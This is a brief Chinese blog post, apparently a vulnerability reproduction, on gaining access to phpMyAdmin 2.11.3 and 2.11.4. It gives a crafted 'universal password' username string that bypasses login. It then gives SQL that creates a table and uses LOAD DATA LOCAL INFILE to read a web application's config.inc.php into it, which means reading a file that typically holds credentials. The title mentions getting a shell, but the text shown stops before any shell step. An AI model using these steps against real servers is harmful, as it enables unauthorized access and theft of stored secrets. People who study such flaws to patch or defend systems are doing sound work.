18803天

phpmyadmin低权限getshell

发布于 2年前 / 346 次围观 / 0 条评论 / 漏洞复现 / JunMo

phpmyadmin万能密码漏洞

影响版本:2.11.3 / 2.11.4

利用方法:用户名处写入‘localhost’@'@”则登录成功。

CREATE TABLE `test`.`a` (`a1` TEXT NOT NULL ); //在test这个库创建一个表名为a字段名为a1的表。

load data local infile 'D:\\xampp\\htdocs\\uc_server\\data\\config.inc.php 'into table a; 读取指定文件写入到表里面。

 

 

未显示?请点击刷新